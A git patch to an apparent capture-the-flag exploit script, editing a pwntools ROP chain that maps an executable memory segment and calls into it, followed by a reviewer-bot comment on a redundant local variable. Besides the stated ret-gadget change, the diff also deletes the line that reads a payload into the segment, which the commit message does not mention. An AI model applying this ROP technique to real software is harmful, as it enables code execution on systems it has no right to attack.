From 3d8459f0fd5e9794e90386492ec8a01303c3b813 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Fri, 22 Dec 2023 13:04:00 +0100
Subject: [PATCH] removed unnecessary ret gadget
---
 Day 22/exploit.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/Day 22/exploit.py b/Day 22/exploit.py
index e9c569f..136d569 100755
--- a/Day 22/exploit.py
+++ b/Day 22/exploit.py
@@ -88,8 +88,9 @@ def try_char(offset, char):
 pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
 pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
+ ret = rop.find_gadget(['ret'])
- rop.raw(rop.find_gadget(['ret']))
+ rop.raw(ret)
 rop.raw(pop_rcx_ret)
 rop.raw(32)
 rop.raw(pop_rdi_ret)
@@ -101,9 +102,7 @@ def try_char(offset, char):
 else:
 rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
- rop.raw(rop.find_gadget(['ret']))
 rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
- rop.read(0, new_segment, 100)
 rop.call(new_segment)
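Review bot: The new `ret` local in the first hunk is referenced only once on the new side, because the second hunk deletes the other `rop.raw(rop.find_gadget(['ret']))`, so the binding earns its place only if it also records why this one entry stays when the commit title calls the other unnecessary. A one-line comment above `ret = rop.find_gadget(['ret'])` giving that reason would do it; the reason is not visible in the hunk, so the author has to supply it. The added line also uses single quotes while the two lookups directly above it use double quotes, so `ret = rop.find_gadget(["ret"])` would match them. The surrounding code starts before and continues after the hunk.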